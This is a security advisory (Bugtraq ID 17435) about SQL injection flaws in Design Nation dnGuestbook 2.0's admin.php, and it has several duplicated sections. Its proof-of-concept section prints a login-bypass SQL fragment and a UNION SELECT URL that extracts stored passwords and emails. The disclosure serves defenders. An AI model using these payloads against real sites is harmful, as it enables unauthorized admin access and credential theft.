Design Nation DNGuestbook Admin.PHP SQL Injection Vulnerabilities
BID:17435
Info
Design Nation DNGuestbook Admin.PHP SQL Injection Vulnerabilities
| Bugtraq ID: | 17435 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 10 2006 12:00AM |
| Updated: | Apr 11 2006 05:42PM |
| Credit: | snatcher <[email protected]> is credited with the discovery of this vulnerability. |
| Vulnerable: |
Design Nation dnGuestbook 2.0 |
| Not Vulnerable: | |
Discussion
Design Nation DNGuestbook Admin.PHP SQL Injection Vulnerabilities
dnGuestbook is prone to SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.
Successful exploitation could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
dnGuestbook 2.0 is vulnerable; earlier versions may also be affected.
dnGuestbook is prone to SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.
Successful exploitation could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
dnGuestbook 2.0 is vulnerable; earlier versions may also be affected.
Exploit / POC
Design Nation DNGuestbook Admin.PHP SQL Injection Vulnerabilities
An exploit is not required.
The following proof-of-concept examples are available:
SELECT * FROM dnguestbook_user WHERE mail='' OR 1 = 1 /* AND passwort='b0000m'
http://www.example.com/path_to_gb/admin.php?gbgo=edit&id=-999%20union%20select%200,passwort,0,mail,mail,mail,mail,0,0,passwort%20from%20dnguestbook_user
An exploit is not required.
The following proof-of-concept examples are available:
SELECT * FROM dnguestbook_user WHERE mail='' OR 1 = 1 /* AND passwort='b0000m'
http://www.example.com/path_to_gb/admin.php?gbgo=edit&id=-999%20union%20select%200,passwort,0,mail,mail,mail,mail,0,0,passwort%20from%20dnguestbook_user
Solution / Fix
Design Nation DNGuestbook Admin.PHP SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]:[email protected]
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]:[email protected]
References
Design Nation DNGuestbook Admin.PHP SQL Injection Vulnerabilities
References:
References:
- Home Page (Design Nation)